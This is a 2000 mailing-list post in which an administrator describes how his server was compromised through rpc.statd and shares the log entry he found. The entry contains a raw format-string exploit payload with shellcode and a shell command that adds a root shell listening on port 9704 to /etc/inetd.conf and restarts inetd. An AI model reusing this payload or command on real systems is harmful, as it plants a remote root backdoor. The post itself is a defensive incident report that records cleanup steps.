Security Incidents mailing list archives

You guys were right


From: c_patin () HOTMAIL COM
Date: Sun, 27 Aug 2000 21:39:59 -0000

First off, I just want to thank everyone who responded to my
"Widespread Hole" message. You were all right, it wasn't a
hole in an installed package at all. It was a compromise in
rpc.statd. I have checked my logs and located the following
hack that I wanted to share:

Aug 12 07:43:14 mymachine rpc.statd[458]: SM_MON request for
hostname containing '/':
^D÷ÿ¿^D÷ÿ¿^E÷ÿ¿^E÷ÿ¿^F÷ÿ¿^F÷ÿ¿^G÷ÿ¿^G÷ÿ¿08049f10 bffff754
000028f8 4d5f4d53 72204e4f 65757165 66207473 6820726f
6e74736f 20656d61 746e6f63 696e6961 2720676e 203a272f
000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000bffff70400000000000000000000000000000000000000000000000bffff7050000bffff7060000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000V¸Í1Û
ë#Ø@Íè°ÿÿÿ/bin/sh -c echo 9704 stream tcp nowait root
/bin/sh sh -i >> /etc/inetd.conf;killall -HUP inetd

This was the hack that was used to compromise the system.
The /etc/inetd.conf file had a modified date of August 12th,
so I was able to scan the logs based on that date and sure
enough, the above item was found.

I've completely formatted my system and installed all
available patches and placed a hardware firewall in front of
my machine. I've also installed Tripwire, so I should be
able to tell when something like this happens again.

Thanks again for all the suggestions,
Carey


Current thread: